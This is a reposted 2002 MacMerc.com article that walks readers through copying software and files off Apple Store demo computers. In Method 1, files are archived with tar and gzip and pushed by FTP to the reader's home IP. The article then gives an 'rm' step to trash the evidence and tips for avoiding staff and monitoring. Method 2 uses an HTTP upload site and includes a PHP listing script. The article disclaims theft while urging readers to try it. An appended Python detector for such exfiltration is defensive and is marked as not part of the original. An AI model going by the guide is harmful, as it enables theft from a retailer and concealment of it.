Apr 27 2009
Apple Store security negated!
By xmachackerx@hotmail.com
3/5/02 © MacMerc.com
Here’s the warning: MacMerc.com and all of its writers and publishers DO NOT
condone STEALING from Apple Computer; this article is just for the curious minds
in our audience. We suggest that you NOT try anything discussed here.
It came to my mind after visiting the local Apple Store that a devious person
could easily suck software (or any sort of file) off of the rows and rows of
fabulous computers, each decked out with super high-speed internet access. At
least at my local store the upstream is at least 50K/s which is pretty zippy.
The downstream is blistering but we don’t need to download anything to pull
off this hack. Internet access on ALL of the computers seems really cool, you
can check your email or send an iCard off from the mall. Ohhhh…. Ahhhh….
But to me I saw one thing and one thing only, FREE SOFTWARE.
MacOS X is pretty much the only MacOS that could pull this off so easily. If you
have a classic machine that you want stuff off, read Method 2. Included in X is:
an FTP server, an HTTP server, compression utilities and an FTP client. These are
all of the tools needed to pull off both of the following methods. Yes, I have
tried these at the Apple Store. They could work anywhere with Macs and broadband
but the Apple Store is the most high profile location with both (and lots of
goodies to take).
As of press time the methods detailed in this article do work. They may become
obsolete once Apple reads this (I’m assuming they will fix this quickly, maybe
a matter of hours). So if you are reading this on the day of publication run
out to the store and try it out, just don’t tell them who sent you. There
is a story circulating that the Apple Store will have Photoshop 7 on their computers….
That might be a nice thing to snatch but again we do not condone stealing. Please
do not try this if you aren’t prepared to face the consequences.
METHOD 1:
Step 1:
• On your home computer (I am assuming you are running X or another variant
of *nix) go to (/Applications/Utilities/Network Utility.app) and write down
your IP address. For this method you must have an always-on connection. If you
don’t have it, go check out Method 2. Some of you may have a
router to share access across a LAN. If so, go ahead and set Port Forwarding
(or something similar sounding) to forward port 21 to your node. This should
be in your router’s manual; it’s not a hard thing to do. If you do have a router,
write down the IP of the ROUTER, not of your node (the node’s IP is local-only and
thus won’t be accessible at the store). To find that, just log into your router (most
home routers allow a web browser to log in and change settings). With the combination
of forwarding and the IP of your router you can access your computer from any
internet access point.
Step 2:
• If you don’t already have FTP access turned on, go ahead and do it.
- Go to the System Preferences and select Sharing.
- Select the check box that says allow FTP access.
Step 3:
• Go to the Apple Store and find a computer that has no one around it.
You may want to play around a little first and have a sales person ask you if
you need help. Just say you are just looking and thank him. After that they
will leave you alone, as long as you seem rather savvy. I used a TiBook but
all of their computers have Internet access.
Step 4:
• Find the item that you want. It doesn’t have to be software; it can be any sort
of file that you have permissions for. I first tried this with pictures (they are
nice and small). If what you want is a single file and kind of small skip the
following step, otherwise continue. It can be hard to choose.
Step 5:
• Go to Aladdin DropStuff (in the /Applications/Utilities/ dir) and stuff
your file. If it is not there (it may have been deleted) open up the Terminal
(/Applications/Utilities/Terminal.app on a default install) and type:
    tar -cf /YOURFILENAME.tar /path/to/file/free/warez
Where YOURFILENAME is what you want the file to be called and /path/to/file/free/warez
is the path to your file (you can drag it to the terminal and it fills this
in for you).
Now to save a little space we are going to gzip that file.
    gzip /YOURFILENAME.tar
Step 6:
• Now we are going to FTP… back at the terminal type the following:
    ftp your.ip.address
*Note – I took this screen shot at home as to not get busted. The IP is my local
IP so don’t try anything.
- Obviously replace your.ip.address with that number you wrote down.
- After a second or two, depending on the traffic between your two computers, a
prompt for a username will appear. Type in your log-in for X. It will ask for a
password, which you must provide.
- It is a very good idea to make a dummy user on your system before you go to the
store. Who knows what monitoring stuff they are running? Better safe than sorry!
Step 7:
• We are now logged in to your computer from the Apple Store. Now just type:
    put /YOURFILENAME.tar.gz
- All you do now is hit enter and wait.
- The best thing to do in this situation is to hide the window (option-click on
the desktop) and get interested in iMovie or something. Depending on file size you
can play around for a few seconds or minutes.
- After it says you are done you have the file residing on your computer…
Step 8:
• Good kids always trash the evidence…
rm /YOURFILENAME.tar.gz
Exit out of all the applications you may have opened, step back and be proud
you have compromised Apple Computer
(not that anyone would want to, or anyone would follow these directions).
METHOD 2:
This is the method that I tried originally… Basically because I had all of
the code written for a website of mine before the Apple Store was even around.
It is harder to pull off unless you like to tweak code (if you do it is FUN!).
The major advantage is that it will work with a slow connection as long as you
have access to a web host with a fast one. It can be shared among friends without
having to dish out passwords to your computer which is also a major plus.
The basic concept is that you set up a website with an HTTP upload form and
it just sends the file to your server. I will give some links to some CGIs
with potential but no directions for setting them up on X; if you need directions,
the CGIs come with them. If you are more of a novice on X, just use Method
1 or find a friend.
- http://www.ftls.org/en/examples/cgi/eUpload.shtml
- http://www.hotscripts.com/Perl/Scripts_and_Programs/File_Manipulation/Upload_Systems/
I wrote some PHP code that lists all files that you uploaded to a certain
directory. PHP can be installed on X, directions can be found here.
This can be used in tandem with an upload CGI to make a nice file transfer site
that you can pass around to friends. I even built in a delete function on mine
so that you can delete files from the web. Pretty sweet! I used this code in
my first attack. The code follows below sans the deleting option:
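<?php
// written by xmachackerx@hotmail.com use at will
function do_files($dir) {
    // $dir is appended to a fixed base path; pass it from your own code,
    // never straight from request input.
    $handle = @opendir("/path/to/$dir");
    if ($handle === false) {
        return; // directory missing or unreadable, nothing to list
    }
    // Entries that should not show up in the listing.
    $skip = array(".DS_Store", "..", ".", "index.html");
    while (false !== ($file = readdir($handle))) {
        if (in_array($file, $skip)) {
            echo " ";
        } else {
            // Uploaded file names are untrusted, so escape them before output.
            echo " " . htmlspecialchars($file) . "\n";
        }
    }
    closedir($handle);
} // close function
?>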
If you really need the delete feature just email me.
I didn’t include it because unless you are adding session management to the
page it is really pointless, anyone can delete files (like the Apple Store employee
that walks to the computer and hits [delete] and your upload goes bye bye).
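How both methods look from the store's side of the network, as an added example that is not part of the original article: Method 1 starts with an outbound FTP login on port 21, and both methods end with a demo machine sending far more data than it receives. The flow records, demo subnet and thresholds below are constructed assumptions.

```python
import csv
import ipaddress

# Constructed sample flow records (not from the article), one per connection:
# time,src,dst,dst_port,bytes_out,bytes_in
SAMPLE_FLOWS = """\
12:01:10,10.20.0.11,203.0.113.7,80,1800,412000
12:03:42,10.20.0.14,198.51.100.23,21,640,910
12:03:45,10.20.0.14,198.51.100.23,49152,48200000,3100
12:09:02,10.20.0.17,203.0.113.50,80,36500000,5200
12:10:30,10.20.0.12,203.0.113.7,80,2100000,1900000
12:11:00,192.168.5.9,198.51.100.23,21,500,700
"""

DEMO_NET = ipaddress.ip_network("10.20.0.0/24")  # assumed demo-floor subnet
FTP_CONTROL_PORT = 21
MIN_UPLOAD = 5_000_000  # assumed threshold: bytes sent in one connection
UPLOAD_RATIO = 20       # assumed: sent/received ratio that marks an upload


def find_exfil(flow_text):
    """Return (time, src, dst, reason) for suspicious demo-machine flows."""
    alerts = []
    for t, src, dst, port, out_b, in_b in csv.reader(flow_text.splitlines()):
        if ipaddress.ip_address(src) not in DEMO_NET:
            continue  # only demo machines are in scope here
        port, out_b, in_b = int(port), int(out_b), int(in_b)
        if port == FTP_CONTROL_PORT:
            # A demo machine has no reason to log in to an outside FTP server.
            alerts.append((t, src, dst, "outbound FTP"))
        elif out_b >= MIN_UPLOAD and out_b >= UPLOAD_RATIO * max(in_b, 1):
            # Covers the FTP data channel and an HTTP form upload alike:
            # browsing is download-heavy, an upload is the reverse.
            alerts.append((t, src, dst, "upload-heavy flow"))
    return alerts


if __name__ == "__main__":
    for alert in find_exfil(SAMPLE_FLOWS):
        print(*alert)
```

Blocking outbound port 21 from the demo subnet stops Method 1 outright; the upload-ratio rule is what still catches Method 2, which rides on ordinary web traffic.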
Have fun and remember to NOT STEAL SOFTWARE… IT IS ILLEGAL.
Please email any suggestions directly to me, I’ll try my best to get back to all of you. Thanks!
-Anonymous Coward
*Editors note: We’ve set up a discussion thread for you in the forums.






